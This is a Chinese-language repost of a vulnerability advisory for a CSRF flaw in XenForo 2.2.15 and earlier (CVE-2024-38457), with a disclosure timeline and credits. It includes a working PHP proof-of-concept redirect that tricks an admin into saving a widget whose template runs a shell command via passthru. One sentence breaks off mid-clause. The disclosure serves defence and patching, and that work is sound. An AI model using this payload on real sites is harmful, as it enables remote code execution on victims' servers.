• 软件链接:
https://xenforo.com
• 受影响的版本:
版本 2.2.15 及之前的版本。
• 漏洞描述:
该XFAdminControllerWidget::actionSave()方法定义在/src/XF/Admin/Controller/Widget.php脚本中,在保存小部件之前不会检查当前 HTTP 请求是 POST 还是 GET。XenForo 仅对 POST 请求执行反 CSRF 检查,因此该方法可在跨站点请求伪造 (CSRF) 攻击中被滥用,以通过 GET 请求创建/修改任意 XenForo 小部件,并且还可与KIS-2024-06结合使用以执行基于 CSRF 的远程代码执行 (RCE) 攻击。
此外,XenForo 实现了一个BB 代码系统,因此这个漏洞也可以通过滥用
攻击者控制的网站上托管的脚本exploit.php可能如下所示:
<?php
$url = "https://victim.website/xenforo/";
header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{$xf.app.em.getRepository('XF\Util\Arr').filterRecursive(['id'],'passthru')}}");
?>
成功利用此漏洞需要受害用户具有管理样式或小部件的权限并且当前登录到管理控制面板。
• 解决方案:
更新至固定版本或应用供应商补丁。
• 披露时间表:
[2024 年 2 月 22 日] – 漏洞详细信息已发送至SSD 安全披露
[2024 年 5 月 6 日] – 供应商发布补丁和修复版本
[2024 年 6 月 14 日] – 请求 CVE 标识符
[2024 年 6 月 16 日] – 已分配 CVE 标识符
[2024 年 7 月 16 日] – 协调公开披露
• CVE 参考:
常见漏洞和暴露项目 ( cve.mitre.org ) 已将此漏洞命名为CVE-2024-38457 。
• 致谢:
埃吉迪奥·罗马诺 (Egidio Romano) 发现的漏洞。
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
https://karmainsecurity.com/KIS-2024-05
原文始发于微信公众号(Ots安全):XenForo <= 2.2.15 (Widget::actionSave) 跨站请求伪造漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论